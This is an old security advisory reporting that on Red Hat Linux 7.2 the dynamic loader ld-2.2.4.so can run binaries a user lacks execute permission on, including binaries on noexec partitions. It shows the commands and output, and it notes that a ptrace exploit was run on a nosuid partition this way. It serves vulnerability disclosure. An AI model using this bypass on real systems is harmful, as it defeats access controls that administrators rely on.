COMMAND

	Lib ld-2.2.4.so allows access to restricted files

SYSTEMS AFFECTED

	Tested on  Red  Hat  Linux  7.2  (2.4.18  kernel  with  grsecurity-1.9.4
	enabled)

PROBLEM

	Dan Sabau says :
	

	lrwxrwxrwx    1 root     root           11 Apr 15 12:01 /lib/ld-linux.so.2 -> ld-2.2.4.so

	

	This file gives users the ability of running binaries on witch the  user
	doesn\'t have the permission to execute,  it  is  enough  to  have  read
	ability on the file in order to execute it:
	

	-rwxr-xr--    1 root     root        45948 Aug  9  2001 /bin/ls

	

	but using the /lib/ld-2.2.4.so file i can execute the ls command:
	

	[08:51:36][draven@Zero:~]:$/lib/ld-2.2.4.so /bin/ls /

	bin   bzImage   bzImage3  bzImage5  dev  home    lib   mnt  proc  sbin  

	usr

	boot  bzImage2  bzImage4  bzImage6  etc  initrd  misc  opt  root  tmp   

	var

	

	i do not have root preveleges on this account:
	

	[08:51:38][draven@Zero:~]:$id

	uid=1000(draven) gid=10(wheel) groups=10(wheel),16(trust)

	

	The most interesting part is  running  binaries  on  partitions  mounted
	with noexec, lets take this partition:
	

	/dev/sda9 on /home/friends type ext2 

	(rw,noexec,nosuid,nodev,usrquota,grpquota)

	

	i\'ve created a shell acount with the home directory:
	

	[mjj@Zero mjj]$ pwd

	/home/friends/mjj

	

	and wrote this C code in a file test.c
	

	#include <stdio.h>

	void main(void)

	{

	        printf (\"Test\");

	}

	

	i\'ve compiled it & tryed to run:
	

	[mjj@Zero mjj]$ ./a.out

	bash: ./a.out: Permission denied

	

	but when i try to run it with /lib/ld-2.2.4.so:

	

	[mjj@Zero mjj]$ /lib/ld-2.2.4.so ./a.out

	Test

	

	the important thing is to include a full path in the binary name  to  be
	able to execute it. in the same way i\'ve  managed  to  run  the  ptrace
	exploit on a nosuid partition

SOLUTION

	None yet.